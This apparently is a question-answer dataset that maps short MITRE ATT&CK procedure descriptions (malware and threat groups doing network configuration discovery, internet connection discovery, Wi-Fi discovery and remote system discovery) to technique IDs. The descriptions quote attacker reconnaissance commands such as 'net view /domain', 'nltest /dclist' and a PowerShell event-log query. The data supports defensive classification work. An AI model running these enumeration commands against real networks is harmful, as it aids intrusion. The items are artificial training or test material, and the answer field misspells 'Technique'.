+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rifdoor has the ability to identify the IP address of the compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun can detect network adapter and IP address information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin gathers the IP address and domain from the victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal can enumerate IP addresses using `GetIpAddrTable`.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has called GetIpNetTable in attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type has used `ipconfig /all` on a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to determine the domain name and whether a proxy is configured on a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHARPSTATS has the ability to identify the domain of the compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE has the ability to collect the IP address of an infected host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST collected all network interface MAC addresses that are up and not loopback devices, as well as IP address, DHCP configuration, and domain information.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot can collect the IP address of a victim machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to execute the `ipconfig` command.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has collected the domain name of the victim system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon obtains the target's IP address and local network segment.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter gathered the local proxy, domain, IP, routing tables, mac address, gateway, DNS servers, and DHCP status information from an infected host.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot checked if the compromised system is configured to use proxies.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist has the ability to collect the domain name on a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver has the ability to gather network configuration information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve can obtain the IP address of a victim host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish has the ability to enumerate the domain name of a victim, as well as if the host is a member of an Active Directory domain.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang can collect the TCP/IP, DNS, DHCP, and network adapter configuration on a compromised host via ipconfig.exe /all.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp uses the ifconfig -a command.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpicyOmelette can identify the IP of a compromised system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has collected the victim’s external IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can identify the IP address of a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet collects the IP address of a compromised system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sykipot may use ipconfig /all to gather system network configuration details.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sys10 collects the local IP address of the victim and sends it to the C2.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can collected the IP address and domain name of a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: T9000 gathers and beacons the MAC and IP addresses during installation.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie has the ability to identify the IP of the infected host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor has collected the MAC address of a compromised host; it can also use GetAdaptersInfo to identify network adapters.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to identify the MAC address on an infected host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma can collect the local MAC address using `GetAdaptersInfo` as well as the system's IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot obtains the IP address, location, and other relevant network information from the victim’s machine.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can gather information on the network configuration of a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can retrieve the internal IP address of a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UPPERCUT has the capability to gather the victim's proxy information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBferry can detect the infected machine's network topology using ipconfig and arp.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Unknown Logger can obtain information about the victim's IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN gathers the local IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has the ability to identify the domain and the MAC and IP addresses of an infected machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer can gather the IP address from the victim's machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry will attempt to determine the local network segment it is a part of.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMail can identify the IP address of the victim system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can identify the IP address and user domain on the target machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can retrieve network interface and proxy information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can collect IP addresses and local intranet information from a victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy runs the ipconfig /all command.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZeroT gathers the victim's IP address and domain information, and then sends it to its C2 server.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: down_new has the ability to identify the MAC address of a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: iKitten will look for the current IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ifconfig can be used to display adapter configuration on Unix systems, including information for TCP/IP, DNS, and DHCP.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ipconfig can be used to display adapter configuration on Windows systems, including information for TCP/IP, DNS, and DHCP.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can gather victim internal and external IPs.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: nbtstat can be used to discover local NetBIOS domain names.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: route can be used to discover routing configuration information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: xCaon has used the GetAdaptersInfo() API call to get the victim's MAC address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty runs ipconfig /all and collects the domain name.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: zwShell can obtain the victim IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used a Visual Basic script that checked for internet connectivity.","Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used GoldFinder to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through.","Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has ensured web servers in a victim environment are Internet accessible before copying tools or malware to it.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has used `Ping` and `tracert` for network reconnaissance efforts.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used the Ping command to check connectivity to actor-controlled C2 servers.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has tested connectivity between a compromised machine and a C2 server using Ping with commands such as `CSIDL_SYSTEM\cmd.exe /c ping -n 1`.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has checked for network connectivity from a compromised host using `ping`, including attempts to contact `google[.]com`.","Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used tools including BITSAdmin to test internet connectivity from compromised hosts.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has conducted a network call out to a specific website as part of their initial discovery activity.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has run scripts to check internet connectivity from compromised hosts.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used tracert to check internet connectivity.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can check for internet connectivity by issuing HTTP GET requests.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldFinder performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs has used HTTP GET requests to check internet connectivity.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NKAbuse utilizes external services such as ifconfig.me to identify the victim machine's IP address.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Neoichor can check for Internet connectivity by contacting bing[.]com with the request format `bing[.]com?id=`.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can measure the download speed on a targeted host.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuietSieve can check C2 connectivity with a `ping` to 8.8.8.8 (Google public DNS).,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun can test a connection to a specified network IP address over a specified port number.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARUSH has checked for internet connectivity from an infected host before attempting to establish a new TCP connection.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can contact the DNS server operated by Google as part of its C2 establishment process.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can make `Ping` GET HTTP requests to its C2 server at regular intervals for network connectivity checks.,"Tecnique: T1016.001 System Network Configuration Discovery: Internet Connection Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has collected names and passwords of all Wi-Fi networks to which a device has previously connected.,"Tecnique: T1016.002 System Network Configuration Discovery: Wi-Fi Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can collect names and passwords of all Wi-Fi networks to which a device has previously connected.,"Tecnique: T1016.002 System Network Configuration Discovery: Wi-Fi Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet can extract names of all locally reachable Wi-Fi networks and then perform a brute-force attack to spread to new networks.,"Tecnique: T1016.002 System Network Configuration Discovery: Wi-Fi Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team remotely discovered systems over LAN connections. OT systems were visible from the IT network as well, giving adversaries the ability to discover operational assets.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team checked for connectivity to resources within the network and used LDAP to query Active Directory, discovering information about computers listed in AD.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During FunnyDream, the threat actors used several tools and batch files to map victims' internal networks.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `net view` and `ping` commands as part of their advanced reconnaissance.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used `nbtscan` and `ping` to discover remote systems, as well as `dsquery subnet` on a domain controller to retrieve all subnets in the Active Directory.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used AdFind to enumerate remote systems.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has a tool that can detect the existence of remote systems.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has enumerated DC servers using the command net group ""Domain Controllers"" /domain. The group has also used the ping command.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used NBTscan and custom tools to discover remote systems.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira uses software such as Advanced IP Scanner and MASSCAN to identify remote hosts within victim networks.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER typically use ping and Net to enumerate systems.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has utilized various scans and queries to find domain controllers and remote services in the target environment.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Deep Panda has used ping to identify other machines of interest.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has likely obtained a list of hosts in the victim environment.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca used the command powershell “Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -
+property * | findstr “Address”” to find the network information of successfully logged-in accounts to discovery addresses of other machines. Earth Lusca has also used multiple scanning tools to discover other machines within the same compromised network.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN5 has used the open source tool Essential NetTools to map the network and build a list of targets.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used dsquery and other Active Directory utilities to enumerate hosts; they have also used nltest.exe /dclist to retrieve a list of domain controllers.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used Angry IP Scanner to detect remote systems.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used a modified version of NBTscan to identify available NetBIOS name servers over the network as well as ping to identify remote systems.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has enumerated domain controllers using `net group ""Domain computers""` and `nltest /dclist`.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used `net view` to enumerate domain machines.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used network scanning and enumeration tools, including Ping.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer used Microsoft’s Sysinternals tools to gather detailed information about remote systems.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used Ping for discovery on targeted networks.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon has used a netbios scanner for remote machine identification.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has looked for IP addresses in the known_hosts file on the infected system and attempted to SSH into them.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider can enumerate remote systems, such as VMware vCenter infrastructure.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used the net view command.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has used `ping %REMOTE_HOST%` for post exploit discovery.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla surveys a system upon check-in to discover remote systems on a local network using the net view and net view /DOMAIN commands. Turla has also used net group ""Domain Computers"" /domain, net group ""Domain Controllers"" /domain, and net group ""Exchange Servers"" /domain to enumerate domain computers, including the organization's DC and Exchange Server.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used multiple methods, including Ping, to enumerate systems on compromised networks.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. Wizard Spider has also used AdFind, nltest/dclist, and PowerShell script Get-DataInfo.ps1 to enumerate domain computers, including the domain controller.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass uses scripts to enumerate IP ranges on the victim network. menuPass has also issued the command net view /domain to a PlugX implant to gather information about remote systems on the network.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AdFind has the ability to query Active Directory for computers.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Arp can be used to display a host's ARP cache, which may include address resolutions for remote systems.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can use a PowerShell object such as, `System.Net.NetworkInformation.Ping` to ping a computer.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea can enumerate and map ICS-specific systems in victim environments.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can enumerate remote systems using Net View.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer can use net view to discover remote systems.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta can use LDAP queries to connect to AD and iterate over connected workstations.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can broadcasts NetBIOS Name Service (NBNC) messages to search for servers connected to compromised networks.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BloodHound can enumerate and collect the properties of domain computers, including domain controllers.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon uses the net view command.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie runs the net view command,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti has the ability to discover hosts on a target network.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can discover active IP addresses, along with the machine name, within a targeted network.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus can search for other machines connected to compromised host and attempt to map the network.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol can use the ARP table to find remote hosts to scan.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic uses the net view command on the victim’s machine.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has been used to execute net view on a targeted system.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
